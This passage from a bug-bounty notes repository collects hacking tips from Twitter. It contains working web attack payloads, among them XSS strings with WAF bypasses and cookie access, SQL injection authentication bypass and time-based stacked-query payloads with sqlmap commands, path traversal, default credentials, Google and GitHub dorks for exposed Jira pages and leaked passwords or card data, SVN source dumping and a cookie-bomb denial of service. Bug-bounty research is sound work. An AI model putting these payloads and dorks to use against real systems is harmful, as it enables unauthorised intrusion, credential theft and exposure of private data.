105 | [ ] Leaking Reset Token in Response Body
106 | [ ] change 1 char at the begin/end to see if the token is evaluated
107 | [ ] use unicode char jutzu to spoof email address
108 | [ ] look for race conditions
109 | [ ] try to register the same mail with different TLD (.eu,.net etc)
110 |
--------------------------------------------------------------------------------
/tips from twitter /tips_twitter.md:
--------------------------------------------------------------------------------
1 | [ ] Tip 1
2 | ```
3 | Here’s my last finding (P1)
4 | 1- register account
5 | 2- intercept request
6 | 3- here’s the response in image so in “role” parameter we have ROLE_USER
7 | So i don’t know what i can replace it to privilege my account to admin
8 | 4- open source code and look in js files
9 | 5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role”
10 | 6- so i use match and replace to replace value’s
11 | 7- boom privilege my account to admin account with full control
12 | ```
13 | [ ] Tip 2
14 | ```
15 | اسعد الله ايامكم بكل خير
16 |
17 | هذا ثغرة في شركة مايكروسوفت
18 | كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS
19 |
20 | Exploit:
21 | https//anywebsite.com/c:/Windows/Win.ini
22 | ```
23 |
24 | [ ] Tip 3
25 | ```
26 | CloudFront bypass:⚔️
27 |
28 | ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
29 |
30 | Would be interested to know if this is target specific or other CloudFront websites are vulnerable
31 | ```
32 |
33 | [ ] Tip 4
34 |
35 | ```
36 | 1 : Get all the URL from wayback / Gau
37 | 2 : Filter out the js file using httpx
38 | 3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension
39 | ```
40 | [ ] Tip 5
41 | ```
42 | target.com/wp-config.php => 404 not found
43 | target.com/wp-config.php.… ==> 200 ok and downloaded
44 | wp-config.php.swp ==>>200 ok
45 |
46 | after that if its contain encoded using hexadecimal decode it .
47 | ```
48 |
49 | [ ] Tip 6
50 | ```
51 | try testing for SQLi Authentication Bypass :⚔️
52 | username:'--'/"--"
53 | password:'--'/"--"
54 | ```
55 | [ ] Tip 7
56 | ```
57 | default credentials:
58 | PSADMIN:PSADMIN
59 | PS:PS
60 | PSEM:PSEM
61 | Google Dork: intitle:"Oracle+PeopleSoft+Sign-in"
62 | Wrote a nuclei template to test all permutations
63 | ```
64 | [ ] Tip 8
65 | ```
66 | nmap -sV -iL host.txt -oN nmap_scan.txt
67 | Wait a few hours
68 | cat nmap_scan.txt | grep open
69 | ```
70 |
71 | [ ] Tip 9
72 | ```Bybass cloudfaire with cynses search
73 | https://youtu.be/VsM6ERUx_AA
74 | ------------------------------------------
75 | ------------------------------------------
76 | Xss payload
77 | https://github.com/Aacle/xss_payload
78 | ------------------------------------------
79 | ------------------------------------------
80 | Use Nuclei for leaked api.
81 | $ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
82 | ------------------------------------------
83 | ------------------------------------------
84 | #Scan through #TOR
85 | sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5
86 | ------------------------------------------
87 | ------------------------------------------
88 | Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token,
89 | and check access to each repo of main organization
90 |
91 | ------------------------------------------
92 | ------------------------------------------
93 |
94 | bypass alert ==> [alert][0].call(this,1)
95 | ------------------------------------------
96 | ------------------------------------------
97 | ```
98 |
99 | [ ] Tip 10
100 | ```
101 | 1_ Go to SHODAN and get the IP
102 | 2 _ Go to Dirsearch and do a Fuzzing
103 | 3_ Obtaining sensitive data
104 | ```
105 | [ ] Tip 11
106 | ```
107 | Recon Recon Recon!!
108 | Shodan Dorking Always wins.
109 |
110 | ssl:"Company Inc"
111 | Filter results by http title.
112 | Start fuzzing an interesting asset.
113 | Found swagger-ui/
114 | Tried swagger ui xss with
115 | https://github.com/seanmarpo/webjars-swagger-xss
116 | ```
117 | [ ] Tip 12
118 | ```
119 | Have you ever heard about wc-db file disclosure?!
120 |
121 | > you can check it by:
122 | https://target[.]com/.svn/wc.db
123 |
124 | > then you can use this tool to dump all of the website source code
125 |
126 | https://github.com/anantshri/svn-extractor
127 | ```
128 |
129 | [ ] Tip 13
130 | ```
131 | 1. Shodan Dork -> Some Assets.
132 | 2. Fuzzing & got 403 Forbidden on /config dir.
133 | 3. Fuzzing on /config/FUZZ and getting some config files.
134 | 4. Same pattern and it works on another asset.
135 | ```
136 |
137 | [ ] Tip 14
138 | ```
139 |
140 | Default Credentials admin:admin
141 | - shodan dork :
142 | - ssl:"target[.]com" 200 http.title:"dashboard"
143 |
144 | ```
145 | [ ] Tip 15
146 |
147 |
148 | A quick thread about JIRA misconfiguration that I tried today.
149 | ```
150 | 3. Google dorks to find jira dashboards.
151 |
152 | inurl:/ConfigurePortalPages!default.jspa?view=popular
153 | ```
154 | ```
155 | 4. Google dork to find jira filters page.
156 |
157 | inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public )
158 | ```
159 |
160 | [ ] Tip 16
161 | ```
162 | 5. Google dork to find the exposed user list.
163 |
164 | inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log
165 | ```
166 |
167 | [ ] Tip 17
168 | ```
169 | GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information
170 | dork: "org:company extension:csv admin"
171 | leak: "cc number, cvv, email, phone number"
172 | ```
173 |
174 | [ ] Tip 18
175 | Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:
176 | ```
177 | cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403
178 | ```
179 |
180 | [ ] Tip 19
181 | ```
182 | Tip : "GET request for XML not found" changes the request to POST with XXE payload
183 | ```
184 |
185 | [ ] Tip 20
186 | Extract Juicy Info From AlienVault
187 | ```
188 | for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done
189 | ```
190 |
191 | [ ] Tip 21
192 | bypass PHPMYADMIN
193 | ```
194 | phpmyadmin =>301
195 | PHPmyadmin =>200
196 | PHPMYadmin =>200
197 | PHPMYADMIN =>200
198 | phpMYadmin =>200
199 | phpmyAdmin =>200
200 | ```
201 |
202 |
203 | [ ] Tip 22
204 | SVN
205 | ```
206 | 1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
207 | 2. found http://url.com/.svn/
208 | 3. clone & use https://github.com/anantshri/svn-extractor
209 | 4. ./svn-extractor.py --url http://url.com --match database.php
210 | 5. result in output dir and just open it
211 | ```
212 |
213 | [ ] Tip 23
214 | xss
215 | ```
216 | in :
217 | firstname:<img src=x
218 | middlename:onerror
219 | lastname:=alert(domain)/>
220 |
221 | ==========================
222 | 1:- Use https://github.com/Leoid/MatchandReplace
223 | 2:- Import to burpsuite match and replace.
224 | 3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
225 | 4:- The Blind xss payload will added automatically by burp and gospider.
226 | Finally:- 4 BLIND XSS REPORTS.
227 |
228 | ```
229 | [ ] Tip 24
230 | Cookie Bomb
231 | ```
232 | URL that causes the cookie length to exceed request header limits for all requests until the cookie expires.
233 | 1. Find a Cookie set by a parameter
234 | 2. Inject as many commas as you can into the parameter until you DoS that user
235 | ```
236 |
237 | [ ] Tip 25
238 | xss via jwt
239 | ```
240 | 1. Make a jwt token and insert a xss paylaod.
241 | 2. The final url is like url/dest?jwt=vulnerable-jwt-token.
242 | (jwt= paramter was decoding the provided jwt token and show's it into the page).
243 | ```
244 |
245 | [ ] Tip 26
246 | Getting Private Information URLs by curling
247 | ```
248 | 1. Grab all URLs from your target which you think hard to hunt or test or static
249 | 2. Save all files in any.txt
250 | 3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done
251 | 4. All curled response grep for following
252 | Keywords:
253 | drive. google
254 | docs. google
255 | /spreadsheets/d/
256 | /document/d/
257 | NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later
258 | You will get URLs includes juicy information
259 | ```
260 |
261 | [ ] Tip 26
262 | Injecting Payload In Phone Numbers field
263 | ```
264 | https://twitter.com/Pwn2arn/status/1609146484263641089
265 | ```
266 |
267 | [ ] Tip 27
268 | Easy P1 upside_down_face
269 | ```
270 | 1: Collect all the Js files by using the developer tool on mozila
271 | 2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool
272 | 3: Now check manually sensitive keyword js file
273 | ```
274 |
275 | [ ] Tip 28
276 | Tips for my last P1 :
277 | ```
278 | 1 - Found dev portal for developing require Basic Auth
279 | 2 - search in GitHub "domain" docker
280 | 3- found a user try to pull the privite repository and passing the username:pass
281 | 4 - Decode Base64 Basic Auth
282 | 5 - Logged in and full access on all Prod
283 |
284 | ```
285 |
286 | [ ] Tip 29
287 | Github leak for Aws,jira,okta etc
288 | ```
289 | 1. Org:"target" pwd/pass/passwd/password
290 | 2. "target. atlassian" pwd/pass/passwd/password
291 | 3. "target. okta" pwd/pass/passwd/password
292 | 4. "Jira. target" pwd/pass/passwd/password
293 | ```
294 |
295 | [ ] Tip 30
296 | soucremap js
297 | ```
298 | https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
299 | https://github.com/rarecoil/unwebpack-sourcemap
300 |
301 | ```
302 |
303 | [ ] Tip 31
304 | if a site uses AngularJS,
305 | ```
306 | test {{7*7}} to see whether 49 is rendered anywhere.
307 | If the application is built with ASP.NET with XSS protection
308 | enabled, you might want to focus on testing other vulnerability
309 | types first and check for XSS as a last resort.
310 |
311 | AngularJS Client-Side Template Injection
312 | https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE
313 |
314 | ```
315 |
316 | [ ] Tip 32
317 | If a site is built with Rails,
318 | ```
319 | you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the
320 | RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern
321 | www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing
322 | insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook.
323 |
324 | ```
325 |
326 |
--------------------------------------------------------------------------------
/tips from twitter/tips_twitter_P2.md:
--------------------------------------------------------------------------------
1 | [ ] Tips 1
2 | ```
3 | XSS WAF Bypass using location concatenation:
4 |
5 | Payload:
6 | "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
7 | ```
8 |
9 | [ ] Tips 2
10 | ```
11 | [+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay
12 |
13 | Hunting for JSON GET Servlet on /content.1.json however result = 404?
14 |
15 | Try this:
16 |
17 | /conten/.1.json
18 | /conten/t.1.json
19 | /content.tidy.1.json
20 | /conten/.tidy.infinity.json
21 | ```
22 |
23 | [ ] Tips 3
24 | ```
25 | Try these file-uploading extensions accordingly.
26 |
27 | ASP Applications:
28 |
29 | .asa -> potential remote code execution
30 |
31 | .asax -> potential remote code execution
32 |
33 | .asp -> potential remote code execution
34 |
35 | .aspx -> potential remote code execution
36 |
37 | Java Applications:
38 |
39 | .jsp -> potential remote code execution
40 |
41 | .jspx -> potential remote code execution
42 |
43 | Perl Applications:
44 |
45 | .pl -> potential remote code execution
46 |
47 | Python Applications:
48 |
49 | .py -> potential remote code execution
50 |
51 | Ruby Applications:
52 |
53 | .rb -> potential remote code execution
54 |
55 | Other files that should be restricted for most applications:
56 |
57 | .bat
58 | .cgi
59 | .exe
60 | .htm -> potential XSS
61 | .html -> potential XSS
62 | .jar
63 | .rar
64 | .shtml
65 | .svg -> potential XSS
66 | .swf -> potential XSS
67 | .tar
68 | .zip
69 | .cer -> potential XSS
70 | .hxt -> potential XSS
71 | .stm -> potential XSS
72 | ```
73 |
74 | [ ] Tips 4
75 | ```
76 | For first time i found a SQL Injection On **sitemap.xml** endpoint 😎😎
77 |
78 | #bugbountytips #bugbountytip
79 |
80 | target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
81 |
82 | sleep payload
83 | [1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s
84 |
85 | For who asking about sqlmap command in this case
86 |
87 | sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
88 | ```
89 |
90 | [ ] Tips 5
91 | ```
92 |
93 | target[.]com/phpmyadmin/setup/index.php
94 | ==> 301 to login page
95 |
96 | target[.]com/phpMyAdmin/setup/index.php
97 | ==> 200 to phpmyadmin setup
98 |
99 | phpmyadmin 301
100 | phpMyAdmin 200
101 | ```
102 |
103 | [ ] Tips 6
104 | ```
105 | 1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
106 | 2. found http://url.com/.svn/
107 | 3. clone & use https://github.com/anantshri/svn-extractor
108 | 4. ./svn-extractor.py --url http://url.com --match database.php
109 | 5. result in output dir and just open it
110 | credit:@faizalabroni
111 |
112 | ```
113 | [ ] Tips 7
114 | ```
115 | SQLi via parameter name injection.
116 |
117 | Payload:
118 | someparam[id) VALUES (NULL); WAITFOR DELAY '0:0:5';--]=test
119 | ```
120 |
--------------------------------------------------------------------------------